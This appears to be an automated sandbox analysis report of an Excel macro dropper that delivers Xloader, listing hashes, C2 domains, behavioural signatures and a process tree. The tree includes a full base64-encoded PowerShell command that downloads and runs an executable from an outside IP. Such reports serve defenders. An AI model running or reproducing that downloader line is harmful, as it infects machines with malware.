Analysis
-
max time kernel
151s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
17-11-2021 21:45
Static task
static1
Behavioral task
behavioral1
Sample
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Resource
win7-en-20211104
General
-
Target
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
-
Size
14KB
-
MD5
70820ac2bb527bb0a10747a06d2c2b0b
-
SHA1
7289b7ddcdcaa9450c27e1579f36d67a544cee80
-
SHA256
6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753
-
SHA512
64be67485be70ac5aa2539a88c9846282d7178e13a46895d4686ff0ce79378bf9ed4ee7bec00cb88abc0e2e8bb41a9b9ef38aa4ff25b4e4dc6334a96ad1ee4b5
Malware Config
Extracted
http://84.252.122.205/xcx/system.exe
Extracted
xloader
2.5
pufi
http://www.homestechs.com/pufi/
fusiongroupgames.net
hugevari.com
rebeccagriffiths.com
trocaoferta.com
theslashapp.com
codezonesoftware.xyz
sottocommunications.com
minicreators.online
course2millions.com
hfm5n1dhkjqwpe.xyz
xlab-ub.com
silvanaribeirocake.com
thefabinteriordesign.com
mg-leadership.com
petbort.com
ndust.net
203040302.xyz
jakital.com
shophuunghia.info
rednacionaldejuecesrd.net
mauricioeanderson.com
robinbirrell.top
zarazira.com
rescueandrestoreministries.net
tureformamadrid.com
heesafe.com
mistergoo.com
reklamilanlar018.xyz
dailygossiping.com
theebook.guru
keepkalmm.com
teamlsu.club
kendyraedesigns.com
suddennnnnnnnnnnn13.xyz
panaceapp.com
visionaryking83.com
50003008.com
bikingforbalance.com
nishiki-sougou.com
bricokitchen.com
478739.com
donaldpowers.store
lesspricebd.com
xn--tfr61gf5uuhm.group
mysterypowerbike.com
fractalmerch.xyz
foreverphotos0910.net
hungama-play30.online
negotrad.com
afroonline.net
avalche.com
northfacemall.online
deals4me.store
nadanadif.com
lnstagrarn-security.com
lewismiddleton.com
tefatistmus.quest
adavici.com
madnext.online
astraherb.com
phnurse.com
opinionprofesional.com
gameshill.net
kagakubushitsu.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2668 3904 cmd.exe EXCEL.EXE -
Xloader Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/1296-308-0x000000000041D450-mapping.dmp xloader behavioral2/memory/1296-311-0x0000000000400000-0x0000000000429000-memory.dmp xloader behavioral2/memory/3000-320-0x0000000003040000-0x0000000003069000-memory.dmp xloader behavioral2/memory/3000-323-0x0000000003070000-0x00000000031BA000-memory.dmp xloader -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 29 1092 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
Bexscoyaparcyhnfy.exeBexscoyaparcyhnfy.exepid process 4084 Bexscoyaparcyhnfy.exe 1296 Bexscoyaparcyhnfy.exe -
Deletes itself 1 IoCs
Processes:
EXCEL.EXEpid process 3904 EXCEL.EXE -
Suspicious use of SetThreadContext 4 IoCs
Processes:
Bexscoyaparcyhnfy.exeBexscoyaparcyhnfy.exeNETSTAT.EXEdescription pid process target process PID 4084 set thread context of 1296 4084 Bexscoyaparcyhnfy.exe Bexscoyaparcyhnfy.exe PID 1296 set thread context of 3016 1296 Bexscoyaparcyhnfy.exe Explorer.EXE PID 1296 set thread context of 3016 1296 Bexscoyaparcyhnfy.exe Explorer.EXE PID 3000 set thread context of 3016 3000 NETSTAT.EXE Explorer.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXEpid process 3000 NETSTAT.EXE -
NTFS ADS 1 IoCs
Processes:
EXCEL.EXEdescription ioc process File created C:\Users\Admin\AppData\Local\Temp\9CC57F00\:Zone.Identifier:$DATA EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3904 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 47 IoCs
Processes:
powershell.exeBexscoyaparcyhnfy.exeBexscoyaparcyhnfy.exeNETSTAT.EXEpid process 1092 powershell.exe 1092 powershell.exe 1092 powershell.exe 4084 Bexscoyaparcyhnfy.exe 4084 Bexscoyaparcyhnfy.exe 1296 Bexscoyaparcyhnfy.exe 1296 Bexscoyaparcyhnfy.exe 1296 Bexscoyaparcyhnfy.exe 1296 Bexscoyaparcyhnfy.exe 1296 Bexscoyaparcyhnfy.exe 1296 Bexscoyaparcyhnfy.exe 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE 3000 NETSTAT.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
Bexscoyaparcyhnfy.exeNETSTAT.EXEpid process 1296 Bexscoyaparcyhnfy.exe 1296 Bexscoyaparcyhnfy.exe 1296 Bexscoyaparcyhnfy.exe 1296 Bexscoyaparcyhnfy.exe 3000 NETSTAT.EXE 3000 NETSTAT.EXE -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
EXCEL.EXEpid process 3904 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
powershell.exeBexscoyaparcyhnfy.exeBexscoyaparcyhnfy.exeNETSTAT.EXEExplorer.EXEdescription pid process Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 4084 Bexscoyaparcyhnfy.exe Token: SeDebugPrivilege 1296 Bexscoyaparcyhnfy.exe Token: SeDebugPrivilege 3000 NETSTAT.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE Token: SeShutdownPrivilege 3016 Explorer.EXE Token: SeCreatePagefilePrivilege 3016 Explorer.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3904 EXCEL.EXE 3904 EXCEL.EXE 3904 EXCEL.EXE 3904 EXCEL.EXE 3904 EXCEL.EXE 3904 EXCEL.EXE 3904 EXCEL.EXE 3904 EXCEL.EXE 3904 EXCEL.EXE 3904 EXCEL.EXE 3904 EXCEL.EXE 3904 EXCEL.EXE -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeBexscoyaparcyhnfy.exeExplorer.EXENETSTAT.EXEdescription pid process target process PID 3904 wrote to memory of 2668 3904 EXCEL.EXE cmd.exe PID 3904 wrote to memory of 2668 3904 EXCEL.EXE cmd.exe PID 2668 wrote to memory of 1092 2668 cmd.exe powershell.exe PID 2668 wrote to memory of 1092 2668 cmd.exe powershell.exe PID 1092 wrote to memory of 4084 1092 powershell.exe Bexscoyaparcyhnfy.exe PID 1092 wrote to memory of 4084 1092 powershell.exe Bexscoyaparcyhnfy.exe PID 1092 wrote to memory of 4084 1092 powershell.exe Bexscoyaparcyhnfy.exe PID 4084 wrote to memory of 1296 4084 Bexscoyaparcyhnfy.exe Bexscoyaparcyhnfy.exe PID 4084 wrote to memory of 1296 4084 Bexscoyaparcyhnfy.exe Bexscoyaparcyhnfy.exe PID 4084 wrote to memory of 1296 4084 Bexscoyaparcyhnfy.exe Bexscoyaparcyhnfy.exe PID 4084 wrote to memory of 1296 4084 Bexscoyaparcyhnfy.exe Bexscoyaparcyhnfy.exe PID 4084 wrote to memory of 1296 4084 Bexscoyaparcyhnfy.exe Bexscoyaparcyhnfy.exe PID 4084 wrote to memory of 1296 4084 Bexscoyaparcyhnfy.exe Bexscoyaparcyhnfy.exe PID 3016 wrote to memory of 3000 3016 Explorer.EXE NETSTAT.EXE PID 3016 wrote to memory of 3000 3016 Explorer.EXE NETSTAT.EXE PID 3016 wrote to memory of 3000 3016 Explorer.EXE NETSTAT.EXE PID 3000 wrote to memory of 1612 3000 NETSTAT.EXE cmd.exe PID 3000 wrote to memory of 1612 3000 NETSTAT.EXE cmd.exe PID 3000 wrote to memory of 1612 3000 NETSTAT.EXE cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm"2⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Cxrgbutjpc.bat3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBCAGUAeABzAGMAbwB5AGEAcABhAHIAYwB5AGgAbgBmAHkALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwA4ADQALgAyADUAMgAuADEAMgAyAC4AMgAwADUALwB4AGMAeAAvAHMAeQBzAHQAZQBtAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe"C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exeC:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\NETSTAT.EXE"C:\Windows\SysWOW64\NETSTAT.EXE"2⤵
- Suspicious use of SetThreadContext
- Gathers network information
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exeMD5
1784e74e8dd172731e715668f905639b
SHA18f180642955070583837e55fa3c5677c059a1e3c
SHA256ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f
SHA512786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b
-
C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exeMD5
1784e74e8dd172731e715668f905639b
SHA18f180642955070583837e55fa3c5677c059a1e3c
SHA256ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f
SHA512786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b
-
C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exeMD5
1784e74e8dd172731e715668f905639b
SHA18f180642955070583837e55fa3c5677c059a1e3c
SHA256ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f
SHA512786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b
-
C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exeMD5
1784e74e8dd172731e715668f905639b
SHA18f180642955070583837e55fa3c5677c059a1e3c
SHA256ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f
SHA512786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b
-
C:\Users\Admin\Documents\Cxrgbutjpc.batMD5
31814477e987cc1e94638caa7f39f293
SHA1c3814edcc331117303ced19f53006a4ecd09a833
SHA256de24fa627ca42edfb1e5b46804f6dd0ed41fbcbd900eeeb56abc5cb34c1cadd4
SHA51209a06a533d82dc086c345bd1c5ca92b2d582964c963b89e6e0c11c784effe9e4ecfc5e05f2bd3571437a04bead7c2d9fc053bd82538be17a23a473dc949fc268
-
memory/1092-294-0x000002AA54366000-0x000002AA54368000-memory.dmpFilesize
8KB
-
memory/1092-292-0x000002AA54360000-0x000002AA54362000-memory.dmpFilesize
8KB
-
memory/1092-293-0x000002AA54363000-0x000002AA54365000-memory.dmpFilesize
8KB
-
memory/1092-269-0x0000000000000000-mapping.dmp
-
memory/1296-316-0x0000000001890000-0x00000000018A1000-memory.dmpFilesize
68KB
-
memory/1296-308-0x000000000041D450-mapping.dmp
-
memory/1296-313-0x0000000001460000-0x0000000001471000-memory.dmpFilesize
68KB
-
memory/1296-311-0x0000000000400000-0x0000000000429000-memory.dmpFilesize
164KB
-
memory/1296-312-0x0000000001480000-0x00000000017A0000-memory.dmpFilesize
3.1MB
-
memory/1612-322-0x0000000000000000-mapping.dmp
-
memory/2668-265-0x0000000000000000-mapping.dmp
-
memory/3000-319-0x0000000000890000-0x000000000089B000-memory.dmpFilesize
44KB
-
memory/3000-324-0x0000000003520000-0x00000000035B0000-memory.dmpFilesize
576KB
-
memory/3000-323-0x0000000003070000-0x00000000031BA000-memory.dmpFilesize
1.3MB
-
memory/3000-320-0x0000000003040000-0x0000000003069000-memory.dmpFilesize
164KB
-
memory/3000-318-0x0000000000000000-mapping.dmp
-
memory/3016-317-0x0000000002E40000-0x0000000002F03000-memory.dmpFilesize
780KB
-
memory/3016-335-0x0000000005620000-0x0000000005742000-memory.dmpFilesize
1.1MB
-
memory/3016-314-0x00000000054B0000-0x0000000005617000-memory.dmpFilesize
1.4MB
-
memory/3904-119-0x00007FFD11C80000-0x00007FFD11C90000-memory.dmpFilesize
64KB
-
memory/3904-118-0x00007FFD11C80000-0x00007FFD11C90000-memory.dmpFilesize
64KB
-
memory/3904-123-0x000001B929250000-0x000001B929252000-memory.dmpFilesize
8KB
-
memory/3904-124-0x000001B929250000-0x000001B929252000-memory.dmpFilesize
8KB
-
memory/3904-130-0x00007FFD11C80000-0x00007FFD11C90000-memory.dmpFilesize
64KB
-
memory/3904-122-0x000001B929250000-0x000001B929252000-memory.dmpFilesize
8KB
-
memory/3904-120-0x00007FFD11C80000-0x00007FFD11C90000-memory.dmpFilesize
64KB
-
memory/3904-121-0x00007FFD11C80000-0x00007FFD11C90000-memory.dmpFilesize
64KB
-
memory/4084-295-0x0000000000000000-mapping.dmp
-
memory/4084-302-0x00000000053A0000-0x00000000053A1000-memory.dmpFilesize
4KB